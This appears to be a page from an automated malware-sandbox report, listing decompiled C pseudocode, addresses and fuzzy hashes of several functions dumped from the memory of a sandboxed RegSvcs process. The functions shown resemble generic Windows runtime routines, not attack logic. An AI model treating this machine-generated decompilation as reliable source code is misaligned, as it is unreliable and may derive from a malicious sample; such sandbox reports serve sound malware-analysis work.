                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01322b53
                                          0x01322b78
                                          0x01322b78
                                          0x01322b7b
                                          0x01322b7e
                                          0x00000000
                                          0x01322b7e
                                          0x01322b76
                                          0x01322ba5
                                          0x01322ba5
                                          0x01322ba8
                                          0x01322bad
                                          0x00000000
                                          0x00000000
                                          0x01322baf
                                          0x01322baf
                                          0x01322bc2
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b77d10a8aa2c81423cf6846f986d5f7670113327729b721b21e62ee9d165d8df
                                          • Instruction ID: 05e5318e7e3b22556ff54e4f7c213c8ddc8b8924de13527c6701b8d41b0db758
                                          • Opcode Fuzzy Hash: b77d10a8aa2c81423cf6846f986d5f7670113327729b721b21e62ee9d165d8df
                                          • Instruction Fuzzy Hash: D051E376E00135CFCB24EF1CC8909BEB7F5FB88704B05845AE846AB3A4D730AA51CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013BAE44 Relevance: .2, Instructions: 152COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E013BAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E013BC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E013BACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E013BFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E013BEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E01317D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E013B1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E013C1536(0x13e8ae4, (_t74 -  *0x13e8b04 >> 0x14) + (_t74 -  *0x13e8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L013BC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E013BA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0139CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E013BACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                          0x013bae44
                                          0x013bae4c
                                          0x013bae53
                                          0x013bae55
                                          0x013bae5c
                                          0x013bae64
                                          0x013bae68
                                          0x013bae75
                                          0x013bae75
                                          0x013bae78
                                          0x013bae7a
                                          0x013bae7c
                                          0x013bae7f
                                          0x013baea8
                                          0x013baeab
                                          0x013baead
                                          0x00000000
                                          0x00000000
                                          0x013baeb3
                                          0x013baeb8
                                          0x013baebb
                                          0x013baebd
                                          0x00000000
                                          0x013bae81
                                          0x013bae88
                                          0x013bae8f
                                          0x013bae9b
                                          0x013bae96
                                          0x013bae96
                                          0x013bae96
                                          0x013baea0
                                          0x013baea3
                                          0x013baebf
                                          0x013baebf
                                          0x013baec3
                                          0x013baec9
                                          0x013baf0d
                                          0x013baf14
                                          0x013baf3d
                                          0x013baf3d
                                          0x013baf41
                                          0x013baf44
                                          0x013baf67
                                          0x013baf67
                                          0x013baf6a
                                          0x013bafca
                                          0x013bafd1
                                          0x00000000
                                          0x013bafd1
                                          0x013baf6c
                                          0x013baf6d
                                          0x013baf75
                                          0x013baf7c
                                          0x013baf7e
                                          0x013baf80
                                          0x013baf85
                                          0x013baf87
                                          0x013baf99
                                          0x013baf89
                                          0x013baf92
                                          0x013baf92
                                          0x013baf9e
                                          0x013bafa1
                                          0x013bafa3
                                          0x013bafa9
                                          0x013bafb0
                                          0x013bafb2
                                          0x013bafb4
                                          0x013bafbc
                                          0x013bafbc
                                          0x013bafb4
                                          0x013bafb0
                                          0x00000000
                                          0x013bafa1
                                          0x013baf4f
                                          0x013baf57
                                          0x013baf5c
                                          0x013baf5e
                                          0x00000000
                                          0x00000000
                                          0x013baf60
                                          0x013baf64
                                          0x013baf64
                                          0x00000000
                                          0x013baf64
                                          0x013baf1a
                                          0x013baf25
                                          0x00000000
                                          0x00000000
                                          0x013baf27
                                          0x013baf28
                                          0x013baf33
                                          0x00000000
                                          0x013baed0
                                          0x013baed0
                                          0x013baed2
                                          0x013baee1
                                          0x013baee4
                                          0x00000000
                                          0x00000000
                                          0x013baee6
                                          0x013baeec
                                          0x00000000
                                          0x00000000
                                          0x013baefb
                                          0x013baf07
                                          0x013bafd3
                                          0x013bafdb
                                          0x013bafdb
                                          0x00000000
                                          0x013baf07
                                          0x013baed6
                                          0x013baed8
                                          0x013baedf
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013baedf
                                          0x013baec9

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6acacefbc3d19affd345b74ceacb5a751ecb53786373b0202d958b89b0516043
                                          • Instruction ID: 22d2a920bdc8e75ef7a2ca1287d00c8ed77b70b8bc8492fdd84e4fe661729f58
                                          • Opcode Fuzzy Hash: 6acacefbc3d19affd345b74ceacb5a751ecb53786373b0202d958b89b0516043
                                          • Instruction Fuzzy Hash: 7041F571704A119BDB268A2DCCC4BFBBB99AF84628F044219FB5AC7AD0F734D805C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0131DBE9 Relevance: .1, Instructions: 149COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E0131DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E012FCC50(E012F4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E01317D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E013C8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E01312280(_t58, _v44);
						E0131DD82(_v44, _t102, _t98);
						E0131B944(_t102, _v5);
						return E0130FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x13e8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x13e862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x13e8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x13e862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x13bfb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                          0x0131dbe9
                                          0x0131dbf2
                                          0x0131dbf7
                                          0x0131dbf9
                                          0x0131dbfc
                                          0x0131dc00
                                          0x0131dc03
                                          0x0131dc14
                                          0x0131dd54
                                          0x0131dd54
                                          0x0131dd54
                                          0x0131dc18
                                          0x0131dc1d
                                          0x0131dc1d
                                          0x0131dc32
                                          0x0131dc3b
                                          0x0131dc3e
                                          0x0131dc46
                                          0x0131dd5b
                                          0x0131dd62
                                          0x0131dd64
                                          0x0131dd67
                                          0x0131dd69
                                          0x0131dd6b
                                          0x0131dd6e
                                          0x0131dd70
                                          0x0131dd73
                                          0x0131dd73
                                          0x00000000
                                          0x0131dc4c
                                          0x0131dc4e
                                          0x01363ae3
                                          0x01363ae8
                                          0x01363aea
                                          0x0131dce7
                                          0x0131dce9
                                          0x0131dcec
                                          0x0131dcee
                                          0x0131dcf0
                                          0x0131dcf3
                                          0x0131dcf5
                                          0x01363af2
                                          0x01363af5
                                          0x01363af5
                                          0x0131dd06
                                          0x0131dd08
                                          0x0131dd0b
                                          0x0131dd12
                                          0x01363b08
                                          0x0131dd18
                                          0x0131dd18
                                          0x0131dd18
                                          0x0131dd20
                                          0x0131dd23
                                          0x01363b16
                                          0x01363b16
                                          0x0131dd29
                                          0x0131dd2d
                                          0x0131dd36
                                          0x0131dd40
                                          0x0131dd51
                                          0x0131dd51
                                          0x0131dc54
                                          0x0131dc59
                                          0x0131dc59
                                          0x0131dc5e
                                          0x0131dc5e
                                          0x0131dc63
                                          0x0131dc66
                                          0x0131dc6b
                                          0x0131dc78
                                          0x0131dc7b
                                          0x0131dc81
                                          0x0131dc81
                                          0x0131dc83
                                          0x0131dc89
                                          0x00000000
                                          0x00000000
                                          0x0131dd7b
                                          0x0131dd7b
                                          0x0131dc8f
                                          0x0131dc8f
                                          0x0131dc92
                                          0x0131dc99
                                          0x0131dc9f
                                          0x0131dca5
                                          0x0131dcaa
                                          0x0131dcaa
                                          0x0131dcb3
                                          0x0131dcb8
                                          0x0131dcbb
                                          0x0131dcc1
                                          0x0131dccf
                                          0x0131dcd2
                                          0x0131dcd5
                                          0x0131dcd7
                                          0x0131dcda
                                          0x0131dcdc
                                          0x0131dcdc
                                          0x0131dce2
                                          0x0131dce4
                                          0x00000000
                                          0x0131dce4

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8e7a6ebe9cddebde07aeb73ee13ba6f4a6dda4257e687342727c4923e05b22a
                                          • Instruction ID: 1a382549452f944b525c8cb2be50b19fcde306eb15a6976837503f0f5297756e
                                          • Opcode Fuzzy Hash: d8e7a6ebe9cddebde07aeb73ee13ba6f4a6dda4257e687342727c4923e05b22a
                                          • Instruction Fuzzy Hash: D8519F71A00606DFCB19CFACC484AAEFBF5BF49318F24855AD559A7348DB70A944CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0130EF40 Relevance: .1, Instructions: 147COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E0130EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E012F9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77d3c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E012F2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                          0x0130ef4b
                                          0x0130ef4d
                                          0x0130ef57
                                          0x0130f0bd
                                          0x0130f0c2
                                          0x0130f0d2
                                          0x0130f0d2
                                          0x0130f0c2
                                          0x0130ef5d
                                          0x0130ef5f
                                          0x0130ef67
                                          0x0130ef6a
                                          0x0130ef6d
                                          0x0130ef74
                                          0x0130ef7f
                                          0x0130ef82
                                          0x0130ef82
                                          0x0130ef86
                                          0x0130ef88
                                          0x0130ef8c
                                          0x0130ef8f
                                          0x0130ef8f
                                          0x0130ef8f
                                          0x00000000
                                          0x0130ef91
                                          0x0130ef93
                                          0x0130efc4
                                          0x0130efc4
                                          0x0130efc4
                                          0x0130efca
                                          0x0130efd0
                                          0x0130f0a6
                                          0x00000000
                                          0x00000000
                                          0x0130f0af
                                          0x0135bb06
                                          0x0135bb0a
                                          0x0130f0b5
                                          0x0130f0b5
                                          0x0130f0b5
                                          0x0130f0b5
                                          0x00000000
                                          0x0130efd6
                                          0x0130efd9
                                          0x0130f0de
                                          0x0130f0e2
                                          0x0130efdf
                                          0x0130efdf
                                          0x0130efdf
                                          0x0130efe5
                                          0x0135bafc
                                          0x0135bafc
                                          0x0130efe5
                                          0x0130efeb
                                          0x0130efed
                                          0x0130f00f
                                          0x0130f011
                                          0x0130f01a
                                          0x0130f01d
                                          0x0130f021
                                          0x0130f028
                                          0x0130f029
                                          0x0130f029
                                          0x0130f02c
                                          0x00000000
                                          0x0130f02c
                                          0x0130eff3
                                          0x0130eff9
                                          0x0130f0ea
                                          0x0130f0ed
                                          0x0130f0ef
                                          0x00000000
                                          0x0130f0ef
                                          0x0130f003
                                          0x0135bb12
                                          0x0130f045
                                          0x0130f049
                                          0x0130f051
                                          0x0130f09e
                                          0x0130f0a0
                                          0x0130f0a0
                                          0x0130f09e
                                          0x0130f053
                                          0x0130f064
                                          0x0130f064
                                          0x0130f06b
                                          0x0135bb1a
                                          0x0135bb1a
                                          0x0130f071
                                          0x0130f071
                                          0x0130f07d
                                          0x0130f082
                                          0x0130f08f
                                          0x0130f08f
                                          0x0130f009
                                          0x0130f00d
                                          0x00000000
                                          0x0130f00d
                                          0x0130efd0
                                          0x0130ef97
                                          0x0130efa5
                                          0x0130efaa
                                          0x00000000
                                          0x0130efac
                                          0x0130efac
                                          0x0130efac
                                          0x00000000
                                          0x0130efb2
                                          0x0130f036
                                          0x0130f03a
                                          0x0130f040
                                          0x0130f090
                                          0x00000000
                                          0x0130f092
                                          0x0130f042
                                          0x00000000
                                          0x0130f042
                                          0x0130efb7
                                          0x0130efb9
                                          0x0130efbc
                                          0x0130efb0
                                          0x0130efb0
                                          0x00000000
                                          0x0130efbe
                                          0x0130efbe
                                          0x0130efc1
                                          0x00000000
                                          0x0130efc1
                                          0x0130efbc
                                          0x0130efaa
                                          0x0130ef91

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction ID: cffbdb4f4a53a05418d29b62ace3e623e5715b4844f13c34153c1694d2b7f13d
                                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction Fuzzy Hash: 7C51E030A04249DFEB26CB68C1A0BAEFBF5AF0531CF1881BCD955972C2C375A989C751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C740D Relevance: .1, Instructions: 141COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E013C740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0134D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0133F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L01314620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L01314620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0133F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L01314620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                          0x013c740d
                                          0x013c740d
                                          0x013c7412
                                          0x013c7413
                                          0x013c7416
                                          0x013c7418
                                          0x013c741c
                                          0x013c741f
                                          0x013c7422
                                          0x013c7422
                                          0x013c7428
                                          0x013c742a
                                          0x013c742a
                                          0x013c7451
                                          0x013c7432
                                          0x013c744f
                                          0x013c744f
                                          0x00000000
                                          0x013c7434
                                          0x013c7438
                                          0x013c7443
                                          0x013c7517
                                          0x013c7517
                                          0x013c751a
                                          0x013c7535
                                          0x013c7520
                                          0x013c7527
                                          0x013c752c
                                          0x013c7531
                                          0x013c7533
                                          0x00000000
                                          0x013c7533
                                          0x00000000
                                          0x013c7531
                                          0x013c754b
                                          0x013c754f
                                          0x013c755c
                                          0x013c755c
                                          0x013c755f
                                          0x013c7560
                                          0x013c7561
                                          0x013c7562
                                          0x013c7563
                                          0x013c7568
                                          0x013c756a
                                          0x013c756c
                                          0x013c756d
                                          0x013c756d
                                          0x013c756f
                                          0x013c7572
                                          0x013c7574
                                          0x013c7577
                                          0x013c757c
                                          0x013c757f
                                          0x00000000
                                          0x013c7551
                                          0x013c7551
                                          0x013c7551
                                          0x013c7553
                                          0x013c7553
                                          0x013c7449
                                          0x013c7449
                                          0x013c744c
                                          0x013c744c
                                          0x00000000
                                          0x013c744c
                                          0x013c7443
                                          0x013c750e
                                          0x013c7514
                                          0x013c7514
                                          0x013c7455
                                          0x013c7469
                                          0x013c746d
                                          0x00000000
                                          0x013c7473
                                          0x013c7473
                                          0x013c7476
                                          0x013c7480
                                          0x013c7484
                                          0x013c748e
                                          0x013c7493
                                          0x013c7493
                                          0x013c7496
                                          0x013c7499
                                          0x013c74a1
                                          0x013c74b1
